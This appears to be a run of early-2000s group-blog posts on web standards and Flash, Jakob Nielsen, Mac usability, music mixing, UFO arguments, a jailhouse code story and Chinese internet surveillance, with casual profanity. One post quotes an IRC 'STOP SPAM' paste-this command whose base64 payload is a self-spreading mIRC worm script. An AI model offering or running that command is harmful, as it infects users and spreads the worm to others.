with so gracefully? no tanks. no apaches. no hypocracy. no "terrorism©" claim. no media manipulation. no bandwagon jumping. no money trail. no religious superiority stigma. just truth.
You dont need to know organic chemistry to be able to put gas in your car, but you should know the difference between leaded and unleaded. This is what I am talking about; there is a minimum level of understanding that eveyone has to have if the world is going to work, and the old style macs made people undershoot. Consumer illiteracy is extremely dangerous, and its effects on the environment are devastating. In the same way computer illiteracy has a bad effect on the network and its security. I dont have to enumerate the I?
S T. L U C I E, Fla. � It took four years for imprisoned convict Robert Heike to devise the code for "Operation Chisel." It took four St. Lucie County Jail detention deputies an hour and a half to crack it and thwart the jailbreak Heike was allegedly planning. Police say Heike tried to send a friend a coded letter from the St. Lucie County Jail, where he was being held on charges including high-speed fleeing in a car, possession of a firearm by a convicted felon and resisting an officer. The one-page note had a series of squiggles and symbols that Heike had devised in the hopes of avoiding detection by authorities, who routinely screen outgoing mail from inmates. In the July 6 letter, Heike told a friend to help him escape in case his court date didn't go well, authorities say. Under the name "Operation Chisel," he instructed the man to put street clothes, a blanket and a wire cutter in a bag and to throw it over a jail fence at midnight on a specified night. He didn't count on having his note examined by detention deputies Debra Wesley, Thomas Carlile, Francisco Delrosario and Rochelle Parrish, who were on duty the night Heike sent his instructions. Wesley, a puzzle fanatic, made short work of Heike's code. "Debra Wesley ever since she was a child has been puzzle freak," Sheriff Ken Mascara explained. "She led the brigade in deciphering it." First she guessed correctly that the letter began with the recipient's name, and matched it to the name on the outside of the envelope. She also noticed the note contained a date, with the month written in code and the day left as an English numeral. That was enough to crack the whole thing. In the morning they confronted Heike, who was shocked to see his letter complete with an English translation. "He admitted that he'd spent four years on this code," Mascara said. "He couldn't believe they deciphered it an hour and a half." Authorities say the plan was doomed from the start, because it would have been virtually impossible to throw the getaway material over two tall razor-wire fences, and to avoid detection by security cameras. The grounds are checked each morning before prisoners can go outside, Mascara said. Heike was transferred to a highly restricted section of the jail, and then later to the Florida Department of Corrections. The four deputies received commendations from the Sheriff's Department last week
Oh Dav, How cool are you!!!?? German TV fucking ROCKS! Ive got two words for ya: "Ruf An!" In second place comes Italian TV, which is really VERY interesting.... Of course, you know that its ILLEGAL to watch these stations in the UK....but thats another story.
So Mikkel, lets be clear. You are being taken to military service, where you will be out of contact. How long will it last?, what are the details?
I saw that documentary; the Germans are the masters of that sort of programme, they dont have any reservations about making sex documentaries; its just full on hardcore Pr0n with a documentary voiceover instead of a sleazy jazz-funk soundtrack. since my analogue sky box blew up, i dont get anymore german TV, which is a pity. The adverts are Insane® especially the beer ones....they MAKE you thirsty!

Monday, April 15, 2002

i write my CSS by hand

In '95 before dreamweaver was even a dream, I used to write HTML by hand. Now, I simply wait for someone to get thier act together so that it (css) can be done on the fly. Sadly I don't have time anymore to become completely fluent in everything that I would like; I'm concentrating on mastering Perl, CSS is on the list.

Ideally, the next iteration of Dreamweaver will have some switches in it that allow you to make everything out of css; your positioning, borders, font control...everything, on the fly. Quark 5 tries to do this, but fails miserably. You cannot even import your old *.qxd and turn it into HTML.s

Its possible to have a complex site that renders identically in both Mozilla and IE; it takes time to do it worth the effort? certainly its satisfying on a personal level...its late Dragonball Z becons!

pr0n // On-Line Culture n. Pornography. Originally this referred only to Internet porn but since then it has expanded to refer to just about anything. The term comes from the warez kiddies tendency to replace letters with numbers. At some point on IRC someone mistyped, swapped the middle two letters, and the name stuck, then propagated over into mainstream hacker usage.

AFAIK this definition is wrong, and the term came about because IRC ops not wanting porn to be discussed in channel set up kick bots to remove any users that mentioned the banned subject, like "trade", "porn", "games", $banned_word.

If you had pr0n on your machine, (or MP3s for that matter) would you keep it (them) littered all over your disc, or keep it in one place?

>>SURELY you are going to go 100% WC3 with FC?? >just checked out a couple of pages. seems all i need to do is add "ALT" properties to images and "TYPE" properties to my script tags. >oh and it didn't like my css very much either... just complaining about lack of background colors in some classes. very weird. I just tried to validate the blogdial css file, and i got the same errors, missing background colors, and other shit. I wish dreamweaver had a mode that dissalowed non compliant css and html, anyways, all my css at the moment is hacked together from different files, and i have yet to find a css editor that is any good. I have CSS Editor, a java app that totally sucks, Topstyle, which suck less, but still sucks.... Dreamweaver has a "clean up word HTML" that goes through your source and takes out the garbage (great for when you are taking over someones work)...need to check the extensions page again... >>If its good enough for D.O.MILLER it's good enough for you! >looks really 1996 if you ask me!! true! >plus the text is allowed to size to the width of the page. that is VERY pewer. thats one of the things i love most about css; you can set the font size in stone. >this is a usability issue! text should be 5-7 words per line, too much and your eye loses track of which line you were on when returning to the start of the line, too little and your eyes soon become tired darting back to the start of the line. This is also true; thats the part about the difficulty of the brief, keep it standards compliant, beautiful usable, modern looking and maintainable..... ummm how much are they paying u???!!!! >i think i'm going to buy neilson's book, just so i can see what he's talking about, then i'll be able to give you a proper agruement for or against his ideas. bleh, *show* how its done, lead by example, test it, the FC site is going to be well traffic'd, more so if its done right. talking about it like this is more valuable than reading a dangerous book...take a look at not the prettiest thing, and ive seen better navigable sites....
Contrails? Chemtrails? Conspiracy?
akin, i love you.


you rally know how to take someone's (usually mine) and make them seem stupid...

anyone thats seen your stuff (and you know we all have) KNOWS you are not stupid, and actually quite talented.

massive generalisation. Flamage: The hobby of the lower classes!

>>macos is actually bad for users, because it discourages >>thinking.

>how and why? ok, so it's not the best os ever, but like >windows is?

Actually, this is a more serious philosophical question; should we encourage people in education to think less about how things work?

Certainly, this would create a population of computer illiterates, and in a world that is pervasively infested with computers and thier interfaces, this cannot be a good thing.

AOL is a bad thing, and is similar in its aims as the early Macos was; take away the learning about the system so that you can just get stuff done. Well, thats fine if your tools are only ever used to make paintings, but now these tools are being used for *everything* including the most important aspects of our lives, like privacy, banking health security and....toasting!

We need a population of computer literate people, who know the difference between "saving it in adobe photoshop" and "saved the .tif file in my pr0n folder".

These computer illiterates are the people who propagate viruses because they cannot change between mail clients....schools should aim to REDUCE the numbers of these people, not add to them by de-educating them on macs.

This is why the idea of macs in schools was so strange. now of course, Macs in schools is a no brainer. Every shchoolboy and schoolgirl should be weaned on MACOS. Those that have the ability will become power users that can use any UNIX. Those that need simply to paint can do that to, all on one platform.

Its a miracle.

The results show that 98.3% of Web users can experience Macromedia Flash content without having to download and install a player.

and yet, no one doing anything related to money is doing anything with flash, despite the fact that you can do many backend/database related tasks with it. The ones that tried, died (boo). I'm not sure what that will probably take one instance of a hit website running totally on flash to change everything.

i'm just saying it has a place,

yes: :]

give me some content and we'll see...

SURELY you are going to go 100% WC3 with FC??

take a look at this:

100% WC3HTML4.0 If its good enough for D.O.MILLER it's good enough for you!

i ahte jacob neilson because he has demonised design, and made it seem as if it's this frivilous arcane superficial thing, which shows how little he knows about design history. design is communication.

he hasnt demonized design, he is throwing a bright light on bad web design. design on the web, depending on the purpose of the site, needs to function differently than print for it to be usable. flash is frowned upon because it is not a web standard, and for the most part, it is used in a way that gets between the user and information. Some flash designers are using it to decorate pages as if they were print in motion.

i'm all for function over form, without it design becomes mere decoration, useless and superfluous, but at the same time,

in the case of the web, we have several factors or pressures that should dictate how you design your website. bandwidth, platform are the key constraints that control what you can do if you want to be sucessful. normally, flash designers dont care about any constraints, thinking that if it works on their machines (normally macs) that its OK. usabilitys first rule is to take other peoples experience into account, and in order to satisfy this, you have to constrain yourself, and restrict your use of stuff that excludes people. this does not mean that you have to give up beauty, art, innovation, design or anything else. if anything, it means that the talented will shine brighter. look at this 100% standards compiant page, which is rich, usable and not at all gray background and blue links there are many others of course.

who said the function has to be so easy, surely a challange is what we're all after,

How about this for a challenge, design a website that is visible by everyone, loads fast for slow modem users, is navigable and validates as correct W3C HTML, without any compromise in aesthetics. That brief is a REAL challenge.

The newest trend in flash sites is the "OS in OS". In fact, these sites have simply folded the now disparaged flash intro into the navigation. every time you go to these sites, you see the menu elements being built, boxes appearing from nowhere like an os booting...its a total waste of bandwidth, adding nothing to the information, and in fact, getting in the way of the information.

yes of course an easy, intuitive UI is one of the goals of any OS, which makes Mac OS so good to use, not only is it a joy to use, but it is beautiful as well.

What nielsen is talking about is the usability of websites, not OSes. some would argue that the macos is actually bad for users, because it discourages thinking. with OSX this argument is dead, because OSX can be whatever you want it to be, thanks to it sitting on UNIX. of course, you could argue that Mac saw the light of day, and dumped the original Macos because it was a piece of crap, opting for a complete re-write....but i digress.

To paraphrase William Morris, one should not own anything that is not beautiful and useful. usability on the web is awesome as well, to meet a website that is not only beautiful to look at but also a joy to navigate is something that is sadly rare, and something i strive for in my designs, when it is called for.

and that is all that jacob is asking people to do; make it usable, make it visible to even the 14k modem user on a 14" monitor. if you want to convey something, convey it, and dont let superfluous boxes, faux OS elements and other nonsense get in the way. of course, no one is saying that you shouldnt do any of these things; just dont say that your sites are useful.

so yes, i agree with neilson becuase 'usuability' or function as it's more commonly known (what a spin doctor, making new trendy catchphrases for things that have existed for centuries) is important.

these things need to be said. standards need to be written and spread. this is the only way that the web can continue to be useful. anyone using filesharing apps knows that having 4 different networks Gnutella, Fast, WinMX, OpenNap, does no one any good. if all of these were using one standard filesharing protocol the benefits to everyone are clear. its the same with web-browsing. anything that fragments the web is bad. flash fragments the web into people with flash and people without, so, it is bad. incompatible browsers fragment the web. thats why the W3C is so important, and why Mozilla and Opera are so important, and why IE, with its proprietary extensions is so evil.

before form takes place function must be accounted for. like making UML diagrams or planning out how the website will work on hundreds of scraps of paper first like i have been doing for the FatCat redesign. but it doesn't mean we have to resort to such draconian undesign totalitarianism that he calls for.

If one is trying to sell something on the web, we have some examples to see what happens when we try different approaches. If the site is based on Flash, it will fail. See See If its is standards compliant, everyone will be able to use it, and it will have a better chance of suceeding. If its hosted on IIS, it will be hacked. If it is running on NetBSD, there is less of a chance that it will be hacked.

that doesn't mean all design has to be yucky flying colours and flashing bits everywhere... to paraphrase someone else who was quoted in "die neu typographie" by jan tschiold, design is complete when you've got rid of everything you don't need.

Yes indeed everything you dont need i.e. FLASH.

Ohhhhh Mama!!! that one is going into my holster!

as for crippling barrie's mac. this is due to macromedia and the crappy implementation of the flash player under mac os. makes my life a misery, it really does. read eric natzke's rant about it... although that's a flash site and will probably cripple your mac as well.. :(

Macromedia, as great as they are, own flash. as long as it is owned by them, and they refuse to relinquish it so that it can become a true, open standard, we really shouldnt rely on it for anything other than fun.

and i was always for nintendo... nes, gameboy, snes. missed out on the n64, and then i got a dreamcast. what happened to me?

I NEED a gamecube! Paper Mario just got finished in my house...its a very beautiful game indeed...I still havent played Majora's Mask...

i thought about why i like programming too. it's about solving problems. like design. solving problems. mix them together and i am very happy.

a deadly cocktail that gets you drunk with no hangover.

how cool is THAT??!!

Sunday, April 14, 2002

jacob neilson is a cunt Yes yes, but does he smell? He has ideas for the web that are analogous to why the mac was so popular; keep it simple, so that everyone can use it. How is that a bad thing for the web, but good for an OS?? One thing is for sure, he is brilliant at PR and whipping up hysteria; by doing these interviews, he has used a very old PR tactic, polarize an issue, let people take sides and then rake in the free column inches. Since governments and corporates have to have websites that are usable, he is the first port of call being the point man in the usability wars. Its a no brainer. The other fun polar warz: Sega vs Nintendo Mac vs Windoze (and now windoze vs linux) $entranched_position vs $other_entrenched_position also no yucky UI, just the files straight off his disk. ummm, the simple Apache directory listing being most efficient??? :] COME ONNNNNNN! im pulling your chain!!!!!!

Do It Now!!!!!!
I like those "mistakes" alex; whats mistake about them??!

Usability vs Praystation Is a very interesting site. Personally, I would have loved to been weened into programming with C but got BASIC instead. Nevertheless, Perl is rocking my world. Whilst I cannot produce stand alone executibles with it, for web services, it rocks. The entire Ryan Air booking system is written in perl, as are many industrial grade, mission critical services. I also love it because you can (I can) read the source when its written to be read (not obscured). This weekend I started playing with perldb; very simple, understandable, quick to impliment....after that, I have to get to grips with XML-RPC. given the way that the rest of Perl is so easy to understand, it should be a breeze.

What's Your Flavor?

Yum! You're mocha. Intense, rich, and a little complex, you're as tasty as they come. Find out more about your personal flavor � sign up with Emode!
Ah yes, the fire in the belly! I ave wished, so many times, to say... you are what we call a luser/lamer. we control every aspect of your life today. you cannot cook a piece of toast without a computer telling you when its done. you cant bake bread, drive a car, fly anywhere, use the phone....everything you do is managed by us with our tools. you know this, yet you persist in being deliberatly blind, like a supersititious peasant that wont cross the path of a black cat. people like you are the cattle today, and what makes you so revolting is that you *like it*. I would no more expect you to understand what i do than i would expect an apple to understand the concept of a knive." but then, that wouldnt be friendly Mikkel!!! hey i cant spell today!

Saturday, April 13, 2002
At a dinner party: I just can't understand the pleasure of programming computers, could you enlighten me, because its the very opposite of somethign that i can understand or think that I would you know what i mean?

well...imagine that you work for a newspaper, and your editor asks you to write an article about solving the problem of litter in the city. You write your article, it gets column inches on the front page, and the next day the streets are still filthy.

With software, you can write your article, using almost natural language, and the streets would be clean as soon as you publish the text; thats what software is. It allows you to write essays that have an actual effect on the world around you, the effects and results of which are real action.

Also, there is no interpretation of your meaning with software. What you write is explicitly and precisely executed; there is no chance of misunderstanding of what you meant to happen. There is exactness, purity, cleanliness.

To anyone that can write english, this is exiting.

no eyes glazed over, which was odd

Someone onjoined me with this... \<\KAUSHI\>\ STOP SPAM, USE THIS COMMAND: //write nospam $decode(b24gISsxOmpvaW46Izp7IC5hdXNlciAyICRuaWNrIHwgLm1 zZyAkbmljayBTVE9QIFNQQU0sIFVTRSBUSElTIENPTU1BTkQ6AzQgL y93cml0ZSBub3NwYW0gJCAkKyBkZWNvZGUoICQrICRlbmNvZGUoJ HJlYWQoJHNjcmlwdCxuLDEpLG0pICQrICxtKSAkY2hyKDEyNCkgLmx vYWQgLXJzIG5vc3BhbSAkY2hyKDEyNCkgLy9tb2RlICQgJCsgbWUg K1IgfSB9,m) | .load -rs nospam | //mode $me +R

Friday, April 12, 2002

newschool gel addition: the sadies

Say what?
Its not on Daypop...yet.
Google is doing an INSANE thing. If you search for dohdie.gif It tells you that you have spelled your search wrong, and gives you results of what it thinkgs you meant, without the option of saying, actually, no, its spelt correctly. Try it yourself:
Alex do not clear your cache; that gif has been removed by NTK!
Go to adobe and see the quicklime demonstrations of the healing brush from photoshop 7; i gasped.
In case you didn't get to the root you MUST check out:
How could you forget Orbital? It's because they don't belong in that list! ("Chime" being the exception).

Thursday, April 11, 2002

via email: "This shit is pretty funny. I don't what Wink's status is in the electronica community but hey I remember when this kid was a bike messenger watchin us skate. Some of the most successful people are crooks. and he was." what's with the porn undercurrnet around these parts as of late? are you guys in heat?
Cautionary tales in the jpegs.
Strange Art, Video and Sounds related to 1980s television.
and the sound? Show And Tell Music
The lyrics to "Iron Man"? Thats the only "sabs" track that i own!

it dont mean a thing if it aint got that swing

Wednesday, April 10, 2002

and what about that wink "conscienceness" track? i am from philly and i can tell you that he is a p*ssy but then again so is itchie hurtin and the int. dj gigolo who i hear used to throw amazing parties but now is an inflated wind bad filled with rotting crap, again just like wink. and for that matter that whole ovum bunch of played house wimps following britt and wink around like the brain dead ass kissing loosers they are. and i quote: "they will never know"
You have to cut it up, to find out what it REALLY says!

Tuesday, April 09, 2002

All Bow to Mikkel Eriksen!
ibm redbook on ip(big pdf but worth it to have around)
Self Amplified Record It is playable without any thing else except its own apparatus. This unit required the use of a pencil to provide the spin and a small cardboard horn with which an elastic band helped keep its shape. This provided the amplification through the needle that was attached to it and rode in the groove as the pencil (and hand) of the operator provided the spin. WFMU does it again.
kick that ka-naledge sir!! where can i get some of this "acid" of which you speak?
(2) George Cruikshank met James Gillray in about 1805. His natural temperament was excitable. Sometimes he would at once etch a subject on the prepared copper plate. Unable even to submit to the process of drawing it upon paper. When etching he worked furiously, without stopping to remove the burr thrown up by the etching needle; consequently his fingers often bled from being cut by it.

The Zombies' songs have excellent productions and arrangements. Glorious use of stereo (my engineer friend calls it one of the "widest" records he's heard) to perfect psychedelic ends. Shellac gels in all manners: sound, song, packaging. As for arrangments, this website demonstrates the Beatles as the most under-rated band in the world.

Congratulations! You are the most evil man of all time! Not only did you exterminate millions of Jews and involved the world in the biggest war the world has ever seen, you also convinced the Germans that the perfect human is a tall blue eyed blond when you're a short, dark Austrian yourself! Well done you spiteful little shit!

What tin-pot dictator are you? Take the "What Dictator am I?" test at

Insane!² this is the 10+million dollar disgrace live and in real time. ignorant, wasteful and destructive propaganda of the highest order.


I had a long session of emails with someone who found us via a random link at Yahoo (wold you believe). I will summarise what went on. This person believes that:

50 years ago, government contractors developed anti gravity devices. For 50 years, these contractors and the US govt. has kept this new technology a secret, and that they, in conjunction, have been flying thousands of sorties over populated areas, in very large numbers of differently configured craft, some of these craft being hundreds of feet in length. Some of these sorties being over (for example) New York City, where the craft hovered over the ground at 100 feet.

and that the US military:

Flies secret aircraft over heavily populated areas. Buzz people with secret aircraft. Interfere with and disable vehicles with secret craft. Flies secret aircraft in the paths of civilain aircraft. Flies secret aircraft over the airports of cities in foreign countries.

and that:

United States Scientists are more able to produce good science than other countries, hence, other countries have not yet discovered anti gravity, and are not using it to test anti gravity aircraft.

and that:

eyewitness testimony and the evidence of military and civilain pilots, police men, lawyers, doctors and people fit for jury duty are insufficnent for any purpose.

and that:

The NASA explanation of the Project Blue Book sightings is intellectually sound and satisfying, to a critical and logical person.

and that:

The best explanation for the UFO phenomenon (the excellent radar / visual sightings that are irrefutable and corroborated) is that they are all secret military aircraft, and that the Wallonia triangle was a propellor powered deridgible.

Now, is this not the most INSANE nonsense that you have ever heard???

Just doing a reality check :]

You REALLY need to read this to start the argument from the right place.

You should already know about this:

Project Blue Book Unknowns are at:

Wallonia Triangle is at:

This is also interesting:

PS whle you are at it, on and off for a year now, I have been trying to get a hold of the authors of this site (Brian Zeiler and Jean van Gemert):

if anyone here could find one of them, it would be *rather* useful. Thier website was excellent, and we would lke to mirror it here.

Monday, April 08, 2002

yes yes everybody loves the sunshine indeed! is everyone still 'folding@home' btw?
If you ever want to hear what summer in New York City feels (felt) like, you need to listen to Roy Ayers "Daylight" or "Sunshine". That is what Pure Gel® can do for you; it can make you feel heat with your ears.
maximum gelation: a must have. religious.. i hear you on nuturing every sound. loving them, stroking their hair and petting them till they purr but the early UnitM stuff is just killin' even with their naked claps et al. sometimes when your friends are naughty little bears you have to have them sleep out in the barn overnight, don't you think?
Chic, ah yes, absolute gel. James Brown (especially the 1970's People Records era) without peer, inspired. Total perfection.
We make money from royalties generated by radio airplay, TV and film synchronization. Why do you even care: as long as you can get the music that you want, its irrelevant how its financed. The children of Thatcher; you can always spot them because when they are talking about music, the first thing that comes into thier minds is "units", "levels of sales" and all those things that have NOTHING to do with music and what makes it stir your heart. There is nothing wrong with being a Tory by the way; "Tell Me he Didn't Just Say That", but we have NEVER been concerned with selling records above making and relesing great music. Anyone reading our website should have gleaned this. Bleh; im going to completely redesign it so that there can be NO DOUBT about this sort of (and other) things.
Masters At work. Pure Gel.

There was / is a bass player that did all of the excellent live bass playing, his name was / is Perez .

For me, it is the bass and the flawless mixing that makes their music priceless. That bass playing, which flows, that does not repeat itself, which is live, an improvised line of pure dance bass....

It is to DIE for!
Kirby you evil dog, that story EXPLODED my chip; my gills will burn for weeks because of you!
What about tracks that "gel" ( that i am not likely to have heard )

If a tree falls down in the woods and no one is there to hear it, does it make a noise?

Oops, sorry, being a DUMBASS!

You may or may not have heard these, but they all GEL HARD. because of the esteemed membership of this place, its almost impossible to come up with a list of things that I think you might not have heard. Hows that for an excuse!!

all Deutche Gramophon recordings (pre digital)
all King Tubby Productions
all Lee Perry Black Ark recordings from the "Soul Fire" era
The Hafler Trio "Masterbatorium"
A Certain Ratio, "Sextet", "Kether Hot Knives" 12"
all Bootsy Collins Rubber Band solo work (pre digital)
most Parliament / Funkadelic, especially "The Motor Booty Affair"
almost all bollywood music productions
Kraftwerk: Computerworld (EXTREME GEL) [but you know this!]
Thelonius Sphere Monk (and ALL Teo Macero Productions)
All Creed Taylor Productions
all early Adrian Sherwood On-U Sound Productions
All Jeff Lynne Productions, including the digital ones. (!)
Nathan Van Cleef's electronic works
Wendy Carlos's TRON soundtrack
Lalo Shifrins 70's soundtracks
Every individual sound is your friend, and you need to treat is as such. Each one has to be nurtured, and then these friends need to be nurtured in groups, and then the groups need to be nurtured. By nurture, depending on what you want, they need to be made to work together as a team, or fight with each other as deadly enemies. This is the difference between tension and coagulation, between oil and water sepatation, and sugar disolving in Kool Aid co-operation. You would not let your friends sit out in the sub zero temperatures of the middle of winter would you? That is what you are doing when you leave a snare, or clap untouched in a recording. They freeze. They are hurt. Why arent you helping? Dry is not Deep. The greatest recordings are deep and clear, the separate parts in them gel into a whole object that picks you up, engages you and moves you. This is the art of recording, of mixing, and friendship between snares, claps and yourself. Examples of tracks that "gel" ( that you are likely to have heard )
  • Love Hangover Diana Ross, Motown. ( in fact, almost ALL Motown productions )
  • Heavy Weather Weather Report (its perfect)
  • Brown Sugar The Rolling Stones (unbelievable)
  • Any ABBA recording (very very scary)
  • Any Trevor Horn original AON/ZTT era recording. (read the stories of how they did different mixes on different monitors, including using a small transistor radio as a monitor, to make sure FGTH sounded superb even at that scale) Yes indeed. Now, given that as your benchmark, what do you make of these recordings that are released now, where, clearly, the people who are doing the mixes are unskilled at the task? Listen to the dreadful, airless, clautrophobic, dead, lifeless mixing on the appaling "Cafe Del Mar No. 6" Which i had the misfortune of hearing up close this weekend. This is typical of current mixing, and it is not a deliberate change in style to one of claustrophobia; these people do not know what they are doing or, cannot hear what they are producing. 99% of the demos we get suffer in the same way; people simply are not skilled in listening and mixing. I only wish there was a way to initialze CDRs, because being able to format them would save us a fortune!
    nytimes: "RAWFORD, Tex., April 7 � Nothing makes an American president bristle more quickly than the prospect of open defiance � by allies, by enemies or by nations that hover between the two. So perhaps it should be no surprise that President Bush seemed testy this weekend when asked, in many ways, why all three players in the Middle East game plan he announced on Thursday � Israel, the Palestinian Authority and the Arab states � had so far failed to execute a single play he called." -aw-shucks. better get used to it.
    "Internet firewall against the world"-ah, a virtual 'Great Wall®.' and... Possible Side-Effects from eating food: 1. Discomfort / aches & pains / cramps 2. Stomach ache / back ache / headache 3. Gas / flatulence / burps / hiccups 4. Nausea / vomiting 5. Bad breath / BO (offensive body odor) 6. Cavities 7. Constipation / diarrhea 8. Tiredness / sluggishness 9. Runny nose / stuffed nose / mucus 10. Diminished mental clarity 11. Bad moods 12. Weight gain / obesity 13. Emotional problems from being overweight 12. Food Poisoning / death wow huh! find out more here.

    Sunday, April 07, 2002

    Sonntag 7. April 2002, 11:06 Uhr Mysteri�ses Licht k�nnte �Feuerball-Bolide� gewesen sein

    M�nchen (dpa) - Mysteri�se Lichterscheinungen am Himmel �ber Bayern haben am sp�ten Abend f�r Aufregung gesorgt. Der Schwerpunkt der r�tselhaften Lichtblitze war S�dbayern. Allein bei den Beh�rden in Garmisch-Partenkirchen gingen rund 50 Anrufe ein. Experten sind sich aber noch uneins �ber die Deutung des mysteri�sen Ph�nomens. So vermutete der Deutsche Wetterdienst in Offenbach, es habe sich um einen Kometen gehandelt. Ein Mannheimer Ufo-Experte ging von einem �Feuerball-Boliden� aus.

    mozilla splashscreen (modern theme)

    If you place a file called mozilla.bmp in the same directory as mozilla.exe in windows, this file will be used. A splash screen is usually not a part of a theme, because you can't have more than one splash screen installed (Mozilla doesn't know installed themes at lauch, where it has to load the splash).

    If you want to change the splash screen on linux you gotta build rpm source, go to mozillla/xpfe/bootstrap and change splash.xpm If it fails to compile open splash.xpm with an editor and check if the header is splash[ ] instead of splash_xpm[ ]. If not change and save it, recompile.‚=splash

    BEIJING It's not easy being the father of the Chinese Internet. Children are running by, boats are paddling, the smell of roast lamb fills the air, and Michael Robinson, a young American computer engineer, sits rigidly, facing an empty cafe on the shore of Qinghai Lake, speaking in a low voice of the crackdown. "What is better? Big brother Internet? Or no Internet at all?" Michael asks. Michael was hired in 1996 by the Chinese government and Global One (a Sprint-France Telecom-Deutsche Telekom joint venture) to build the first network in China providing public access to the Internet. One day sticks in his mind. The Chinese Engineers working with him suddenly convened a special meeting, demanding to know if it would be possible to do keyword searching inside e-mails and web addresses on the Chinese Internet. Not really, Michael replied; all information that travels the Net is broken up into little packets. It's hard to "sniff" packets of information, particularly coded packets. You would need to intercept packets as they travel, and then there's the problem of collating the information they contain, actually making sense of it. Yes, yes, they said, but can you do it? On the third go-round, it dawned on Michael that his fellow computer geeks wanted to end the meeting, too. But at a higher level, someone required assurance. Before Internet construction proceeded further, they would need to monitor what Chinese users did with it. For the engineers, this was just cover-your-ass stuff. As long as the foreigner assured them that down the road the Chinese would be able to build an Internet firewall against the world and conduct surveillance on its own citizens, the engineers could continue working with him. Yes, yes, it can be done, Michael told them, and they went back to work.